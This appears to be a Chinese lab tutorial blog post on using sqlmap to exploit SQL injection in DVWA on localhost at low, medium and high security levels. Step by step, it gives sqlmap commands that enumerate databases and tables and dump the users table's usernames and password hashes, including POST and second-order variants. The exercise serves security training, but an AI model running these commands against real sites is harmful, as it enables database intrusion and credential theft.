SQLMap 注入 DVWA实战

一、low级别
1、进入dvwa界面输入1,点击Submit,得到链接
http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#
 
 
2、我们用sqlmap进行爆破
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#"
 
我们可以看到需要跳转到login的页面,所以,认为这里是需要cookie的。
 
3、我们查看cookie后将它添加进去
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"

 

 
 
 
4、查询数据库
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -dbs
 
5、查看dvwa数据库的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -tables
6、查看表中的字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low" -D dvwa -T users --columns
 
 

7、获取字段的信息

sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=low"  -D dvwa -T users -C user,password --dump
 
二、 Medium级别
1、我们输入1,点击Sumbit后发现URL没有改变
 
2、我们利用burpsuit抓包分析, 来查看post方式提交的数据
 
3、 由于这里是使用 post 方式进行传输的,所以我们这里需要使用 --data 参数把数据引入过来
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" --dbs     查看数据库
 
4、查看dvwa数据库下的表
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -tables
 
5、查看字段名
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users --columns
 
6、获取字段中的信息
sqlmap.py -u "http://localhost/dvwa-master/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="security=medium;PHPSESSID=2l6vgat2jiaaemad52bqirchi5" -D dvwa -T users -C user,password --dump
 
三、High级别
1、首先我们注意到这个页面,点击之后会跳转到另外一个页面,所以这个如果想使用sqlmap进行爆破,我们还需要引入一个知识点(参考别人的博客得到)
–second-order(二阶sql注入)
有些时候注入点输入的数据看返回结果的时候并不是当前的页面,而是另外的一个页面,这时候就需要你指定到哪个页面获取响应判断真假。
-–second-order后面跟一个判断页面的URL地址。 (来自简书 作者 m3lon)
 
2、 我们利用burpsuite进行抓包,因为这里无法在页面上获取 post 或者 get 的值。
 
3、我们发现获取到的数据和Medium类似,我们利用sqlmap进行注入
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php"  --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/" -dbs
4、和low级别,medium级别过程一样,我们同样可以获取到数据
sqlmap.py -u "localhost/dvwa-master/vulnerabilities/sqli/session-input.php"  --data="id=1&Submit=Submit" --cookie="PHPSESSID=2l6vgat2jiaaemad52bqirchi5;security=high; " --second-url "http://localhost/dvwa-master/vulnerabilities/sqli/"  -D dvwa -T users -C user,password --dump
 
 
 
 
 
  • 6
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值